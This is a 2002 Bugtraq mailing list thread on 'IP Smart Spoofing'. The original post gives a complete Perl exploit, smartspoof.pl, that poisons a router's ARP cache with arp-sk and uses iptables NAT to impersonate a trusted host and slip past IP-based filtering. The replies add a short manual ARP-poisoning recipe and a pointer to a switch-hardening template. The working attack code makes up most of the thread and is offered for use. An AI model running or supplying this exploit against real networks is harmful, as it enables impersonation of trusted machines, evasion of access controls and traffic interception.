Bugtraq mailing list archives

RE: Exploit code for IP Smart Spoofing

From: "shannong" <shannong () texas net>
Date: Sat, 16 Nov 2002 12:18:46 -0600
The idea Smartspoof is definitely not new.  I don't really need any
software to accomplish this outside of a arp-sk.  

1. If I have access to a transport medium with any router that is
multi-access (i.e ethernet) then I can phyiscally assign the IP address
of the client I want to spoof regardless of the routers subnet address.

2. I use arp-sk or any other method of providing the router with my MAC
address associated with the IP I've assumed.

3. Now I can initiate any session I want through that router as the
"spoofed" client.

4. Any traffic from my machine to that router will keep my MAC address
in its ARP table.


Of course the spoofed client would lose the ability to generate traffic
on its own through our newly spoofed router.  I assume this is the
"service" that Smartspoof provides.


In response to Stephens mitigation techniques, they are wholly
ineffective. This is arp-poisoning not arp spoofing. Current switches
cannot detect or stop this behavior described by the Smartspoof method
or any other arp-poisoning method.  The arp-poisoning takes place in the
data portion of the packet, not the ethernet header.  The switch in
question always sees traffic destined to and from my real MAC address in
the ethernet header. However, the data portion of the packet carries the
fake IP-to-MAC association sent to the router.  Switches do not care or
look at the data portion.  The router now thinks the spoofed IP in
question has my MAC address.  Any traffic to this spoofed IP from the
router will now be destined to my real MAC.  Therefore, the switch only
sees one MAC on my port, which is my real MAC.

This is can be seen 
-----Original Message-----
From: Stephen Gill [mailto:gillsr () yahoo com] 
Sent: Wednesday, November 13, 2002 1:33 PM
To: 'Laurent Licour'; bugtraq () securityfocus com
Subject: RE: Exploit code for IP Smart Spoofing


In order to mitigate this on edge switches it may behoove the network
administrator to review his or her security policy and adhere to
stricter guidelines.  The following document suggests one method for
protecting Cisco switches along with additional guidelines for secure
configuration in a template format.

http://www.qorbit.net/documents/catalyst-secure-template.pdf
http://www.qorbit.net/documents/catalyst-secure-template.htm

Comments or suggestions welcome.
-- steve

-----Original Message-----
From: Laurent Licour [mailto:llicour () althes fr] 
Sent: Tuesday, November 12, 2002 6:21 AM
To: 'bugtraq () securityfocus com'
Subject: Exploit code for IP Smart Spoofing


Hello

As we reported in our previous article: IP Smartspoofing
(http://www.althes.fr/ressources/avis/smartspoofing.htm), we introduced
a new method for IP Spoofing, allowing full-connexion from any client
software.

The exploit code smartspoof.pl is a proof of concept (for educational
purpose only) of the Smart Spoofing method

The additional software "arp-fillup" is necessary to achieve this:
http://www.althes.fr/ressources/tools/arp-fillup/arp-fillup-0.1.tgz

These tools are also available on
http://www.althes.fr/ressources/avis/smartspoofing.htm#tools


Exploit Code (perl source) :

#!/usr/bin/perl -w
#
# smartspoof.pl
#
# This script is provided as proof of concept for educational purpose
only # # Laurent Licour 28/10/02 # llicour () althes fr # Althes
(http://www.althes.fr) # # Start/Stop smartspoofing #
http://www.althes.fr/ressources/avis/smartspoofing.htm
#
# Require linux 2.4 (tested on Redhat 7.3)
# Require NetAddr::IP perl package (www.cpan.org)
# Require arp-sk tool (www.arp-sk.org)
# Require arp-fillup tool
(www.althes.fr/ressources/avis/smartspoofing.htm)
# Require iptables (www.iptables.org)

use strict;
use Getopt::Long;
use NetAddr::IP;

sub get_ip_next_hop
{
  my ($ip0, $int) =3D @_;
  my $ip=3Dnew NetAddr::IP $ip0;
=20
  open(ROUTE, "route -n |");
  <ROUTE>; <ROUTE>;
  my $gateway=3D"";
  my $masklen; my @fields; my $line; my $entry;
  while($line =3D <ROUTE>)
  {
    @fields =3D split / +/, $line;
    $entry=3Dnew NetAddr::IP($fields[0] . "/" . $fields[2]);
    if ($entry->contains($ip))
    {
      if (($gateway eq "") or ($masklen < $entry->masklen()))
      {
        $gateway =3D $fields[1];
        $masklen =3D $entry->masklen();
        $$int =3D $fields[7];
        chop $$int;
      }
    }
  }
  die "Error : No route for $ip \n" if ($gateway eq "");
  $gateway=3D$ip->addr() if ($gateway eq "0.0.0.0");

  return($gateway);
}

sub get_mac
{
  my $ip=3Dshift;
  my $cmd=3D"ping -c 1 -w 1 $ip >/dev/null 2>&1";
  system($cmd);
  $cmd=3D"cat /proc/net/arp | grep $ip' ' | awk '{print \$4}'";
  my $mac=3D`$cmd`;
  chop($mac);
  return($mac);
}

sub usage
{
  print "Start/Stop de smartspoofing\n\n";
  print "This is the proof of concept of the smartspoofing technique\n";
  print "(visit
http://www.althes.fr/ressources/avis/smartspoofing.htm)\n";
  print "\n";
  print "You only have to specify :\n";
  print " -D : address of the filtering equipement to connect to\n";
  print " -S : address of the trusted host to spoof\n";
  print "\n";
  print "Then, you only need to launch your favorite client software
from this host\n";
  print "or any host behind this (because it is now a router)\n";
  print "\n";
  print "This script is provided as proof of concept for educational
purpose only.\n";
  print "\n";

  exit 0;
}

my $syntax =3D "syntax: $0 [-i eth0] [-h] [-v] -D <\@IP destination> -S
<\@= IP
source> -start|-stop\n";

my $ver =3D "smartspoof.pl v1.0 28/10/02\n";

my ($ipsrc, $ipdst);
my ($start, $stop);
my $interface =3D "";
my ($version, $help);

Getopt::Long::GetOptions(
           "D=3Ds" =3D> \$ipdst,
           "S=3Ds" =3D> \$ipsrc,
           "i=3Ds" =3D> \$interface,
           "v" =3D> \$version,
           "h" =3D> \$help,
           "start" =3D> \$start,
           "stop" =3D> \$stop
          ) or die $syntax;


usage if $help;
die $ver if $version;
die $syntax unless @ARGV =3D=3D 0;
die $syntax unless defined($ipsrc) and defined($ipdst);
die $syntax unless defined($start) or defined($stop);
die $syntax if $start and $stop;

my $cmd;

my ($intsrc, $intdst);
my $ipsrc_next_hop =3D get_ip_next_hop($ipsrc, \$intsrc);
my $ipdst_next_hop =3D get_ip_next_hop($ipdst, \$intdst);
$interface=3D$intdst if ($interface eq "");


if ($start)
{
  print "Activate IP Forwarding\n";
  system("echo 1 > /proc/sys/net/ipv4/ip_forward");

  print "Activate Arp fillup on $ipsrc\n";
  system("arp-fillup -i $interface -D $ipsrc >/dev/null 2>&1 &");

  print "Set NAT rule on iptables\n";
  $cmd=3D"iptables -t nat -A POSTROUTING -o $interface -d $ipdst -j SNAT
--= to $ipsrc";
  system($cmd);

  print "Desactivate ICMP Redirect\n";
  system("iptables -A OUTPUT -p icmp --icmp-type host-redirect -j
DROP");

  print "Activate Arp cache poisoning of $ipsrc_next_hop entry on
$ipdst_next_hop on $interface\n";
  $cmd=3D"arp-sk -w -i $interface -d $ipdst_next_hop -S $ipsrc_next_hop
-D $ipdst_next_hop -c 1 >/dev/null 2>&1";
  system($cmd);
  $cmd=3D"arp-sk -r -i $interface -d $ipdst_next_hop -S $ipsrc_next_hop
-D $ipdst_next_hop >/dev/null 2>&1 &";
  system($cmd);
}
elsif ($stop)
{
  print "Suppress Arp fillup on $ipsrc\n";
  system("killall arp-fillup");

  print "Suppress Arp cache poisoning of $ipsrc_next_hop entry on
$ipdst_next_hop\n";
  system("killall arp-sk");
  my $mac=3Dget_mac($ipsrc_next_hop);
  $cmd=3D"arp-sk -r -c 1 -i $interface -d $ipdst_next_hop -S
$ipsrc_next_hop:$mac -D $ipdst_next_hop >/dev/null 2>&1";
  system($cmd);

  print "Clear iptables rules\n";
  system("service iptables stop");
  system("service iptables start");

  print "Desactivate ip forwarding\n";
  system("echo 0 > /proc/sys/net/ipv4/ip_forward");
}




Regards

Laurent Licour
mailto:llicour () althes fr
Althes
http://www.althes.fr

=20



*---------------------------------------------------------------*
* Cet e-mail et toutes les pi=E8ces jointes sont destin=E9s aux     *
* seules personnes auxquelles ils sont sp=E9cifiquement adress=E9s  *
* et n'engagent que le signataire de ces documents et non la    *
* structure dont il d=E9pend.                                     *
* Leur existence et leur contenu ont un caract=E8re confidentiel. *
* Toute utilisation ou diffusion non autoris=E9e est interdite.   *
* Si vous avez re=E7u cet  e-mail ou si vous d=E9tenez sans en =EAtre *
* le destinataire, nous vous demandons de bien vouloir nous en  *
* informer imm=E9diatement.                                       *
* Cette note assure que ce message a =E9t=E9 contr=F4l=E9 et ne
*
* comprenait aucun virus connu =E0 ce jour, n=E9anmoins tout        *
* message =E9lectronique est susceptible d'alt=E9ration.            *
* Nous d=E9clinons toute responsabilit=E9 au titre de ce message    *
* s'il a =E9t=E9 alt=E9r=E9, d=E9form=E9 ou falsifi=E9.
=
    *
*---------------------------------------------------------------*
=20
Current thread:

Exploit code for IP Smart Spoofing Laurent Licour (Nov 12)
- RE: Exploit code for IP Smart Spoofing Stephen Gill (Nov 16)
  - RE: Exploit code for IP Smart Spoofing shannong (Nov 19)
- <Possible follow-ups>
- RE: Exploit code for IP Smart Spoofing Stephen Gill (Nov 15)